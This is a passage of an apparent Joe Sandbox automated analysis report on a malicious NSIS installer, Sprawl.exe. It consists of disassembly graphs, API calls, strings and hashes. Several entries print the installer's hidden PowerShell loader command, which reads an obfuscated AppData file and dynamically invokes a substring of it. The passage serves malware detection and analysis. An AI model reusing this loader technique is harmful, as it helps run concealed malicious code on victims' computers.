                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Sprawl.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                            • API String ID: 4283519449-1144871244
                                                                                                                            • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                            • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                                                            • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                            • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

                                                                                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                            control_flow_graph 728 401751-401774 call 402a3a call 40580e 733 401776-40177c call 405d2f 728->733 734 40177e-401790 call 405d2f call 4057a1 lstrcatA 728->734 740 401795-40179b call 405f9a 733->740 734->740 744 4017a0-4017a4 740->744 745 4017a6-4017b0 call 406033 744->745 746 4017d7-4017da 744->746 754 4017c2-4017d4 745->754 755 4017b2-4017c0 CompareFileTime 745->755 748 4017e2-4017fe call 4059a2 746->748 749 4017dc-4017dd call 40597d 746->749 756 401800-401803 748->756 757 401876-40189f call 404f48 call 402e9f 748->757 749->748 754->746 755->754 758 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 756->758 759 401858-401862 call 404f48 756->759 771 4018a1-4018a5 757->771 772 4018a7-4018b3 SetFileTime 757->772 758->744 792 40184d-40184e 758->792 769 40186b-401871 759->769 773 4028d8 769->773 771->772 775 4018b9-4018c4 CloseHandle 771->775 772->775 777 4028da-4028de 773->777 778 4018ca-4018cd 775->778 779 4028cf-4028d2 775->779 781 4018e2-4018e5 call 405d51 778->781 782 4018cf-4018e0 call 405d51 lstrcatA 778->782 779->773 787 4018ea-402273 call 405525 781->787 782->787 787->777 787->779 792->769 794 401850-401851 792->794 794->759
                                                                                                                            APIs
                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 00401790
                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)","powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 004017BA
                                                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Vulkanbyernes Setup,NSIS Error), ref: 00405D3C
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
                                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                            • String ID: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"$Arabisation\argumenta\dekaderne$C:\Users\user\AppData\Local\Temp\Vedlgges.Fam$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
                                                                                                                            • API String ID: 1941528284-2273613815
                                                                                                                            • Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                                                            • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                                            • Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                                                            • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

                                                                                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                            control_flow_graph 795 402e9f-402eb3 796 402eb5 795->796 797 402ebc-402ec5 795->797 796->797 798 402ec7 797->798 799 402ece-402ed3 797->799 798->799 800 402ee3-402ef0 call 4030b1 799->800 801 402ed5-402ede call 4030c7 799->801 805 402ef6-402efa 800->805 806 40309f 800->806 801->800 807 402f00-402f49 GetTickCount 805->807 808 40304a-40304c 805->808 809 4030a1-4030a2 806->809 812 4030a7 807->812 813 402f4f-402f57 807->813 810 40308c-40308f 808->810 811 40304e-403051 808->811 814 4030aa-4030ae 809->814 815 403091 810->815 816 403094-40309d call 4030b1 810->816 811->812 817 403053 811->817 812->814 818 402f59 813->818 819 402f5c-402f6a call 4030b1 813->819 815->816 816->806 827 4030a4 816->827 821 403056-40305c 817->821 818->819 819->806 829 402f70-402f79 819->829 824 403060-40306e call 4030b1 821->824 825 40305e 821->825 824->806 833 403070-40307c call 405a49 824->833 825->824 827->812 830 402f7f-402f9f call 4061ab 829->830 837 403042-403044 830->837 838 402fa5-402fb8 GetTickCount 830->838 839 403046-403048 833->839 840 40307e-403088 833->840 837->809 841 402fba-402fc2 838->841 842 402ffd-402fff 838->842 839->809 840->821 843 40308a 840->843 844 402fc4-402fc8 841->844 845 402fca-402ffa MulDiv wsprintfA call 404f48 841->845 846 403001-403005 842->846 847 403036-40303a 842->847 843->812 844->842 844->845 845->842 850 403007-40300e call 405a49 846->850 851 40301c-403027 846->851 847->813 848 403040 847->848 848->812 856 403013-403015 850->856 852 40302a-40302e 851->852 852->830 855 403034 852->855 855->812 856->839 857 403017-40301a 856->857 857->852
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                            • String ID: DA$ DA$... %d%%$DwA
                                                                                                                            • API String ID: 551687249-506594815
                                                                                                                            • Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                                                            • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                                                            • Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                                                            • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

                                                                                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                            control_flow_graph 858 40540e-405459 CreateDirectoryA 859 40545b-40545d 858->859 860 40545f-40546c GetLastError 858->860 861 405486-405488 859->861 860->861 862 40546e-405482 SetFileSecurityA 860->862 862->859 863 405484 GetLastError 862->863 863->861
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                            • GetLastError.KERNEL32 ref: 00405465
                                                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                                                            • GetLastError.KERNEL32 ref: 00405484
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                                            • API String ID: 3449924974-3329011080
                                                                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                            • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                            • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

                                                                                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                            control_flow_graph 864 40605a-40607a GetSystemDirectoryA 865 40607c 864->865 866 40607e-406080 864->866 865->866 867 406090-406092 866->867 868 406082-40608a 866->868 870 406093-4060c5 wsprintfA LoadLibraryExA 867->870 868->867 869 40608c-40608e 868->869 869->870
                                                                                                                            APIs
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                            • wsprintfA.USER32 ref: 004060AA
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                                                            • API String ID: 2200240437-4240819195
                                                                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                            • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                            • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                                                                             Control-flow Graph (rendered graph not preserved; executed/not-executed colouring lost): entry block 402364-4023aa (call 402b2f, call 402a3a x2, RegCreateKeyExA); 4023ba-4023c7 (call 402a3a, lstrlenA); 4023cd-4023da (call 402a1d); 4023e0-4023ea (call 402e9f); 4023ef-402403 (RegSetValueExA); 402408-4024de (RegCloseKey); exit block 4028cf-4028de
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                            • lstrlenA.KERNEL32(Arabisation\argumenta\dekaderne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                                            • String ID: Arabisation\argumenta\dekaderne
                                                                                                                            • API String ID: 1356686001-2217045471
                                                                                                                            • Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                                                            • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                                            • Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                                                            • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

                                                                                                                             Control-flow Graph (rendered graph not preserved; executed/not-executed colouring lost): entry block 4059d1-4059db; 4059dc-405a07 (GetTickCount, GetTempFileNameA) with a back-edge from 405a09-405a0b to 4059dc; exit block 405a10-405a13
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                                            Strings
                                                                                                                            • "C:\Users\user\Desktop\Sprawl.exe", xrefs: 004059D1
                                                                                                                            • nsa, xrefs: 004059DC
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                                            Similarity
                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                            • API String ID: 1716503409-4130506415
                                                                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                            • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                            • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                                                                             Control-flow Graph (rendered graph not preserved; executed/not-executed colouring lost): entry block 401bca-401be2 (call 402a1d x2); 401be4-401beb and 401bf4-401bfb (call 402a3a); 401c06-401c1a (call 402a1d x2); 401c1c-401c38 (SendMessageTimeoutA); 401c3a-401c48 (SendMessageA); 401c4a-401c70 (call 402a3a x2, FindWindowExA); exit block 4028cf-4028de
                                                                                                                            APIs
                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                            • String ID: !
                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                            • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                                            • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                                                            • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                                            • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
                                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2987980305-0
                                                                                                                            • Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                                                            • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                                            • Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                                                            • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                              • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,000000F0), ref: 00401634
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 00401629
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
• API String ID: 1892508949-1369816015
• Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
• Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
• Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
• Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
APIs
  • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Vulkanbyernes Setup,NSIS Error), ref: 00405D3C
  • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
  • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
  • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
• lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
• GetFileAttributesA.KERNELBASE(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
